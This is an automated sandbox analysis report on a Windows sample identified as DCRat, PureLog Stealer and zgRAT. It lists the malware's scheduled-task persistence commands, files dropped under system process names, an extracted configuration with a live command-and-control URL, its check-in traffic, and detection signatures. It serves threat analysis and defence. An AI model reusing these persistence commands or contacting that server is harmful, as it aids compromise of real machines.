Edit tour

Windows Analysis Report
F3ePjP272h.exe

Overview

General Information

Sample name:	F3ePjP272h.exe renamed because original name is a hash value
Original sample name:	49715a369f3516495cd8016709b367a7.exe
Analysis ID:	1580724
MD5:	49715a369f3516495cd8016709b367a7
SHA1:	63d60c8a36d6f7bbc8759f7fe141032393051b3c
SHA256:	1dc5fe5617b6fd067b93358ac4829be9683085416d80590f09bc646b49ea2b8a
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

F3ePjP272h.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\F3ePjP272h.exe" MD5: 49715A369F3516495CD8016709B367A7)

schtasks.exe (PID: 6476 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1644 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5596 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4088 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1440 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2464 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6688 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Cookies\sihost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1568 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6552 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4028 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7120 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6584 cmdline: schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6640 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5376 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1816 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5260 cmdline: schtasks.exe /create /tn "F3ePjP272h" /sc ONLOGON /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2380 cmdline: schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5764 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6496 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5996 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

Idle.exe (PID: 1816 cmdline: "C:\Windows\Speech\Engines\SR\Idle.exe" MD5: 49715A369F3516495CD8016709B367A7)

F3ePjP272h.exe (PID: 1372 cmdline: C:\Users\user\Desktop\F3ePjP272h.exe MD5: 49715A369F3516495CD8016709B367A7)

F3ePjP272h.exe (PID: 4580 cmdline: C:\Users\user\Desktop\F3ePjP272h.exe MD5: 49715A369F3516495CD8016709B367A7)

Idle.exe (PID: 5632 cmdline: C:\Windows\Speech\Engines\SR\Idle.exe MD5: 49715A369F3516495CD8016709B367A7)

cmd.exe (PID: 764 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 1480 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

Idle.exe (PID: 1576 cmdline: "C:\Windows\Speech\Engines\SR\Idle.exe" MD5: 49715A369F3516495CD8016709B367A7)

Idle.exe (PID: 6776 cmdline: C:\Windows\Speech\Engines\SR\Idle.exe MD5: 49715A369F3516495CD8016709B367A7)

jmfWpjtPWHWFodUifDHiQtgxi.exe (PID: 4760 cmdline: "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe" MD5: 49715A369F3516495CD8016709B367A7)

jmfWpjtPWHWFodUifDHiQtgxi.exe (PID: 4276 cmdline: "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe" MD5: 49715A369F3516495CD8016709B367A7)

sihost.exe (PID: 3944 cmdline: C:\Users\Default\Cookies\sihost.exe MD5: 49715A369F3516495CD8016709B367A7)

sihost.exe (PID: 1264 cmdline: C:\Users\Default\Cookies\sihost.exe MD5: 49715A369F3516495CD8016709B367A7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://328579cm.renyash.ru/VmMulti", "MUTEX": "DCR_MUTEX-ECwREtx4Ah9meGkc6cqJ", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
F3ePjP272h.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
F3ePjP272h.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Windows\Speech\Engines\SR\Idle.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\Engines\SR\Idle.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2004955727.0000000000702000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: F3ePjP272h.exe PID: 3364	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: F3ePjP272h.exe PID: 1372	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Idle.exe PID: 5632	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.F3ePjP272h.exe.700000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.F3ePjP272h.exe.700000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\Cookies\sihost.exe, CommandLine: C:\Users\Default\Cookies\sihost.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, NewProcessName: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, OriginalFileName: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\Cookies\sihost.exe, ProcessId: 3944, ProcessName: sihost.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\F3ePjP272h.exe, ProcessId: 3364, TargetFilename: C:\Users\Default\Cookies\sihost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Default\Cookies\sihost.exe, CommandLine: C:\Users\Default\Cookies\sihost.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, NewProcessName: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, OriginalFileName: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\Cookies\sihost.exe, ProcessId: 3944, ProcessName: sihost.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-25T19:32:07.175909+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49704	172.67.220.198	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: F3ePjP272h.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://328579cm.renyash.ru	Avira URL Cloud: Label: malware
Source: http://328579cm.renyash.ru/VmMulti.php	Avira URL Cloud: Label: malware
Source: http://328579cm.renyash.ru/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Windows\Speech\Engines\SR\Idle.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\nHnXqlGz.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\xpHnaOLh.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\ECoURVov.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\fRPzNptz.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://328579cm.renyash.ru/VmMulti", "MUTEX": "DCR_MUTEX-ECwREtx4Ah9meGkc6cqJ", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe	ReversingLabs: Detection: 73%
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\ECoURVov.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\fRPzNptz.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kvKyGzpq.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\nHnXqlGz.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\xpHnaOLh.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\zjWVMLxf.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Speech\Engines\SR\Idle.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: F3ePjP272h.exe	ReversingLabs: Detection: 73%
Source: F3ePjP272h.exe	Virustotal: Detection: 54%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\Speech\Engines\SR\Idle.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AxEwwgFd.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ViwkdMoR.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\xpHnaOLh.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ECoURVov.log	Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: F3ePjP272h.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ECwREtx4Ah9meGkc6cqJ","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://328579cm.renyash.ru/","VmMulti"]]

Source: F3ePjP272h.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Directory created: C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe			Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Directory created: C:\Program Files\MSBuild\Microsoft\897f7819a04651			Jump to behavior

Source: F3ePjP272h.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 172.67.220.198:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic

HTTP traffic detected: POST /VmMulti.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 328579cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 328579cm.renyash.ru

Source: unknown

Source: Idle.exe, 0000001A.00000002.2145997422.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://328579cm.renyash.ru
Source: Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://328579cm.renyash.ru/
Source: Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://328579cm.renyash.ru/VmMulti.php
Source: F3ePjP272h.exe, 00000000.00000002.2048080502.000000000303B000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Windows\Speech\Engines\SR\Idle.exe	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Windows\Speech\Engines\SR\Idle.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Windows\Speech\Engines\SR\6ccacd8608530f	Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF848F40D48	0_2_00007FF848F40D48
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF848F40E43	0_2_00007FF848F40E43
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF848F46119	0_2_00007FF848F46119
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF84933A40D	0_2_00007FF84933A40D
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF8493450E2	0_2_00007FF8493450E2
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF849337CBA	0_2_00007FF849337CBA
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF849344336	0_2_00007FF849344336
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 0_2_00007FF849343E39	0_2_00007FF849343E39
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 24_2_00007FF848F20D48	24_2_00007FF848F20D48
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 24_2_00007FF848F20E43	24_2_00007FF848F20E43
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 25_2_00007FF848F20D48	25_2_00007FF848F20D48
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Code function: 25_2_00007FF848F20E43	25_2_00007FF848F20E43
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF848F20D48	26_2_00007FF848F20D48
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF848F20E43	26_2_00007FF848F20E43
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF848F26119	26_2_00007FF848F26119
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF84931B105	26_2_00007FF84931B105
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 26_2_00007FF849317CBA	26_2_00007FF849317CBA
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 27_2_00007FF848F30D48	27_2_00007FF848F30D48
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 27_2_00007FF848F30E43	27_2_00007FF848F30E43
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 28_2_00007FF848F30D48	28_2_00007FF848F30D48
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 28_2_00007FF848F30E43	28_2_00007FF848F30E43
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 29_2_00007FF848F30D48	29_2_00007FF848F30D48
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 29_2_00007FF848F30E43	29_2_00007FF848F30E43
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Code function: 29_2_00007FF848F36119	29_2_00007FF848F36119
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 30_2_00007FF848F30D48	30_2_00007FF848F30D48
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 30_2_00007FF848F30E43	30_2_00007FF848F30E43
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 31_2_00007FF848F10D48	31_2_00007FF848F10D48
